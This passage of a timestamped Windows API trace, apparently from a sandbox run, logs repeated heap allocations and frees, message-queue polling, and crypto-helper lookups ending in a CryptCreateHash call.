hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0244.487] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0244.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0244.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0244.487] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b58 [0244.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0244.488] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0244.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b58 | out: hHeap=0x970000) returned 1 [0244.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0244.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0244.488] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.489] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0244.489] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.489] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.489] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0244.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0244.489] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0244.489] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0244.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.489] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0244.489] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0244.490] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0244.490] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0244.490] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ab0 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0244.490] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0244.490] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0244.491] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0244.491] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0244.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0244.492] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0244.492] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0244.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0244.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0244.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0244.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0244.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0244.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0244.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0244.493] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0244.493] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55bc8 [0244.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0244.542] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.543] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0244.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0244.543] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.543] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0244.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0244.543] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0244.543] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0244.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.544] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0244.544] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0244.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0244.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0244.544] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.544] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0244.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0244.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0244.545] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0244.545] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0244.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0244.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0244.545] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0244.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0244.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0244.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0244.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0244.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51508, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0244.545] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0244.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0244.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0244.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0244.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0244.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0244.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0244.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0244.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0244.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0244.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0244.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0244.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0244.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0244.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0244.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | 